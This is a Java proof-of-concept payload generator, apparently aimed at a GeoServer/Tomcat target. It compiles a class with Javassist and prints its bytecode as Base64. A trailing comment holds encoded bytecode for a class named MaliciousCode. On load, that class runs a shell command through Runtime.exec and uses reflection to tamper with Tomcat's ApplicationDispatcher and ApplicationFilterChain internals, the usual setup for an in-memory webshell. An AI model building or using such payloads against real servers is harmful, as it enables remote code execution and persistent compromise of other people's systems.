package com.example.demo.Main;

import javassist.ClassPool;
import javassist.CtClass;

import java.io.ByteArrayOutputStream;
import java.io.FileOutputStream;
import java.io.IOException;
import java.io.ObjectOutputStream;
import java.util.Base64;
import java.util.zip.GZIPOutputStream;

public class GeoPoc {

    public static void main(String[] args) throws Exception {

        /**
         * MaliciousCode
         * MaliciousCodeFilter
         * MemInjector
         *
         * AddFilter
         * FRain
         * IFRain
         *
         * org.junit.ma.KpLi0rn2
         * xxx
         * com.example.demo.Static.ReflectUtil
         *
         * Step1
         * TomcatInject
         *
         *
         */
        ClassPool classPool = ClassPool.getDefault();
        CtClass ctClass = classPool.getCtClass("com.example.demo.Static.ReflectUtil");
        // 修改类名，去除包信息
        //ctClass.setName("KpLi0rn2");
        byte[] bytes = ctClass.toBytecode();

        // GZIP压缩
        byte[] gzip = gzipCompress(bytes);

        // 输出为 Base64 编码字符串
        String base64String = Base64.getEncoder().encodeToString(bytes).replace(System.lineSeparator(), "");
        System.out.println("bytes (Base64): " + base64String);
    }

    public static byte[] gzipCompress(byte[] data) throws IOException {
        ByteArrayOutputStream out = new ByteArrayOutputStream();
        try (GZIPOutputStream gzip = new GZIPOutputStream(out)) {
            gzip.write(data);
        }
        return out.toByteArray();
    }
}
//yv66vgAAADQAigoABwBDCABECgAFAEUIAEYHAEcKAAUASAcASQoASgBLCABMBwBNCABOCQBPAFAIAFEKAFIAUwgAVAgAVQoABQBWCgAHAFcIAFgKAFkAWgoAWQBbBwBcCgBZAF0KAFkAXgoAWQBfCABgCABhCgBZAGIHAGMKAB0AQwoAWQBkCABlBwBmCgAhAGcHAGgBAAY8aW5pdD4BAAMoKVYBAARDb2RlAQAPTGluZU51bWJlclRhYmxlAQASTG9jYWxWYXJpYWJsZVRhYmxlAQAEdGhpcwEAJ0xjb20vZXhhbXBsZS9kZW1vL1N0YXRpYy9NYWxpY2lvdXNDb2RlOwEACDxjbGluaXQ+AQAMcnVudGltZUNsYXNzAQARTGphdmEvbGFuZy9DbGFzczsBABBnZXRSdW50aW1lTWV0aG9kAQAaTGphdmEvbGFuZy9yZWZsZWN0L01ldGhvZDsBAA9ydW50aW1lSW5zdGFuY2UBABJMamF2YS9sYW5nL09iamVjdDsBAApleGVjTWV0aG9kAQABYwEAAWYBABlMamF2YS9sYW5nL3JlZmxlY3QvRmllbGQ7AQAObW9kaWZpZXJzRmllbGQBAAFlAQAVTGphdmEvbGFuZy9FeGNlcHRpb247AQAWTG9jYWxWYXJpYWJsZVR5cGVUYWJsZQEAFExqYXZhL2xhbmcvQ2xhc3M8Kj47AQANU3RhY2tNYXBUYWJsZQcARwcAaQcASQcAagcAZgEAClNvdXJjZUZpbGUBABJNYWxpY2lvdXNDb2RlLmphdmEMACQAJQEAEWphdmEubGFuZy5SdW50aW1lDABrAGwBAApnZXRSdW50aW1lAQAPamF2YS9sYW5nL0NsYXNzDABtAG4BABBqYXZhL2xhbmcvT2JqZWN0BwBpDABvAHABAARleGVjAQAQamF2YS9sYW5nL1N0cmluZwEAMXRvdWNoIC9Vc2Vycy9hZG1pbi9JZGVhUHJvamVjdHMvZGVtby9zdWNjZXNzMS50eHQHAHEMAHIAcwEAHkNvbW1hbmQgZXhlY3V0ZWQgc3VjY2Vzc2Z1bGx5LgcAdAwAdQB2AQAub3JnLmFwYWNoZS5jYXRhbGluYS5jb3JlLkFwcGxpY2F0aW9uRGlzcGF0Y2hlcgEAEFdSQVBfU0FNRV9PQkpFQ1QMAHcAeAwAeQB6AQAJbW9kaWZpZXJzBwBqDAB7AHwMAH0AfgEAGmphdmEvbGFuZy9yZWZsZWN0L01vZGlmaWVyDAB/AIAMAIEAggwAgwCEAQAvb3JnLmFwYWNoZS5jYXRhbGluYS5jb3JlLkFwcGxpY2F0aW9uRmlsdGVyQ2hhaW4BABNsYXN0U2VydmljZWRSZXF1ZXN0DACFAIYBABVqYXZhL2xhbmcvVGhyZWFkTG9jYWwMAIcAiAEAFGxhc3RTZXJ2aWNlZFJlc3BvbnNlAQATamF2YS9sYW5nL0V4Y2VwdGlvbgwAiQAlAQAlY29tL2V4YW1wbGUvZGVtby9TdGF0aWMvTWFsaWNpb3VzQ29kZQEAGGphdmEvbGFuZy9yZWZsZWN0L01ldGhvZAEAF2phdmEvbGFuZy9yZWZsZWN0L0ZpZWxkAQAHZm9yTmFtZQEAJShMamF2YS9sYW5nL1N0cmluZzspTGphdmEvbGFuZy9DbGFzczsBABFnZXREZWNsYXJlZE1ldGhvZAEAQChMamF2YS9sYW5nL1N0cmluZztbTGphdmEvbGFuZy9DbGFzczspTGphdmEvbGFuZy9yZWZsZWN0L01ldGhvZDsBAAZpbnZva2UBADkoTGphdmEvbGFuZy9PYmplY3Q7W0xqYXZhL2xhbmcvT2JqZWN0OylMamF2YS9sYW5nL09iamVjdDsBABBqYXZhL2xhbmcvU3lzdGVtAQADb3V0AQAVTGphdmEvaW8vUHJpbnRTdHJlYW07AQATamF2YS9pby9QcmludFN0cmVhbQEAB3ByaW50bG4BABUoTGphdmEvbGFuZy9TdHJpbmc7KVYBABBnZXREZWNsYXJlZEZpZWxkAQAtKExqYXZhL2xhbmcvU3RyaW5nOylMamF2YS9sYW5nL3JlZmxlY3QvRmllbGQ7AQAIZ2V0Q2xhc3MBABMoKUxqYXZhL2xhbmcvQ2xhc3M7AQANc2V0QWNjZXNzaWJsZQEABChaKVYBAAxnZXRNb2RpZmllcnMBAAMoKUkBAAZzZXRJbnQBABYoTGphdmEvbGFuZy9PYmplY3Q7SSlWAQAKZ2V0Qm9vbGVhbgEAFShMamF2YS9sYW5nL09iamVjdDspWgEACnNldEJvb2xlYW4BABYoTGphdmEvbGFuZy9PYmplY3Q7WilWAQADZ2V0AQAmKExqYXZhL2xhbmcvT2JqZWN0OylMamF2YS9sYW5nL09iamVjdDsBAANzZXQBACcoTGphdmEvbGFuZy9PYmplY3Q7TGphdmEvbGFuZy9PYmplY3Q7KVYBAA9wcmludFN0YWNrVHJhY2UAIQAjAAcAAAAAAAIAAQAkACUAAQAmAAAALwABAAEAAAAFKrcAAbEAAAACACcAAAAGAAEAAAAFACgAAAAMAAEAAAAFACkAKgAAAAgAKwAlAAEAJgAAAmIABgAHAAABJRICuAADSyoSBAO9AAW2AAZMKwEDvQAHtgAITSoSCQS9AAVZAxIKU7YABk4tLAS9AAdZAxILU7YACFeyAAwSDbYADhIPuAADOgQZBBIQtgAROgUZBbYAEhITtgAROgYZBgS2ABQZBhkFGQW2ABUQ7362ABcZBQS2ABQZBQG2ABiaAAoZBQEEtgAZEhq4AAM6BBkEEhu2ABE6BRkFtgASEhO2ABE6BhkGBLYAFBkGGQUZBbYAFRDvfrYAFxkFBLYAFBkFAbYAHMcAEBkFAbsAHVm3AB62AB8ZBBIgtgAROgUZBbYAEhITtgAROgYZBgS2ABQZBhkFGQW2ABUQ7362ABcZBQS2ABQZBQG2ABzHABAZBQG7AB1ZtwAetgAfpwAISyq2ACKxAAEAAAEcAR8AIQAEACcAAACGACEAAAAKAAYADQARABAAGwATACsAFgA6ABgAQgAcAEkAHQBSAB4AXgAfAGQAIABzACEAeQAiAIIAIwCJACcAkAAoAJkAKQClACoAqwArALoALADAAC0AyQAuANYAMgDfADMA6wA0APEANQEAADYBBgA3AQ8AOAEcAD0BHwA7ASAAPAEkAD4AKAAAAFIACAAGARYALAAtAAAAEQELAC4ALwABABsBAQAwADEAAgArAPEAMgAvAAMASQDTADMALQAEAFIAygA0ADUABQBeAL4ANgA1AAYBIAAEADcAOAAAADkAAAAMAAEABgEWACwAOgAAADsAAAAtAAX/AIkABwcAPAcAPQcAPgcAPQcAPAcAPwcAPwAA+wBM/wBFAAAAAEIHAEAEAAEAQQAAAAIAQg==

//
